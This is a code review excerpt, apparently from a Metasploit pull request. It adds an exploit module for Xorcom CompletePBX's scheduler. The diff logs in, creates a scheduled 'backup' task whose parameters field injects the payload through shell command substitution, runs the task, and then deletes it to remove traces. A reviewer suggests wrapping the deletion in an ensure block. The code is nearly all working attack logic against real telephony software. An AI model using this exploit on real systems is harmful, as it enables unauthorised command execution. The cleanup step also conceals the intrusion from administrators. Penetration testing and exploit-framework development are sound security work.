modules/exploits/linux/http/xorcom_completepbx_scheduler.rb

```diff
@@ -0,0 +1,245 @@
+    end
+
+    tasks.each do |task|
+      if task[2] == task_desc
+        print_good("Found task with ID: #{task[0]}")
+        return task[0]
+      end
+    end
+
+    fail_with(Failure::NotFound, "Could not find the task with description: #{task_desc}")
+  end
+
+  def create_task(sid_cookie)
+    task_desc = Faker::Lorem.sentence(word_count: 4)
+    notes = Faker::Lorem.paragraph(sentence_count: 3)
+    print_status("Creating malicious scheduled task with description: #{task_desc}")
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'POST',
+      'cookie' => sid_cookie,
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        'script' => 'backup',
+        'description' => task_desc,
+        'starting' => Time.now.strftime('%Y-%m-%d %H:%M'),
+        'interval' => '1',
+        'interval_unit' => 'month',
+        'parameters' => "$(#{payload.encoded})",
+        'notes' => notes,
+        'data' => '0',
+        'class' => 'scheduler',
+        'method' => 'save_task',
+        'mode' => 'create'
+      }
+    })
+
+    unless res
+      fail_with(Failure::Unreachable, 'No response from target while creating task')
+    end
+
+    json_res = res.get_json_document
+    state = json_res['state']
+
+    if state == 'success'
+      print_good('Malicious task successfully created.')
+      return task_desc
+    else
+      fail_with(Failure::UnexpectedReply, 'Failed to create the malicious task')
+    end
+  end
+
+  def run_task(sid_cookie, task_id)
+    print_status("Executing malicious task ID #{task_id}...")
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'POST',
+      'cookie' => sid_cookie,
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        'class' => 'scheduler',
+        'method' => 'run_task',
+        'mode' => 'run',
+        'data' => task_id.to_s
+      }
+    })
+
+    unless res
+      fail_with(Failure::Unreachable, 'No response from target while executing task')
+    end
+
+    print_good('Task executed successfully!')
+  end
+
+  def delete_task(sid_cookie, task_id)
+    %w[delete deleteConfirmed].each do |mode|
+      print_status("Sending delete request (mode=#{mode}) for task ID #{task_id}...")
+
+      send_request_cgi({
+        'uri' => normalize_uri(target_uri.path),
+        'method' => 'POST',
+        'cookie' => sid_cookie,
+        'ctype' => 'application/x-www-form-urlencoded',
+        'vars_post' => {
+          'class' => 'scheduler',
+          'method' => 'delete_task',
+          'mode' => mode,
+          'data' => task_id.to_s
+        }
+      })
+    end
+
+    print_good("Task #{task_id} deleted successfully!")
+  end
+
+  def exploit
+    sid_cookie = login
+    task_desc = create_task(sid_cookie)
+    task_id = get_latest_task_id(sid_cookie, task_desc)
+    run_task(sid_cookie, task_id)
+    delete_task(sid_cookie, task_id)
```

Comment:
We should ensure the task is deleted in the event there's an issue when running the task.
```suggestion
    sid_cookie = login
    task_desc = create_task(sid_cookie)
    task_id = get_latest_task_id(sid_cookie, task_desc)
    run_task(sid_cookie, task_id)
  ensure
    delete_task(sid_cookie, task_id) if task_id
```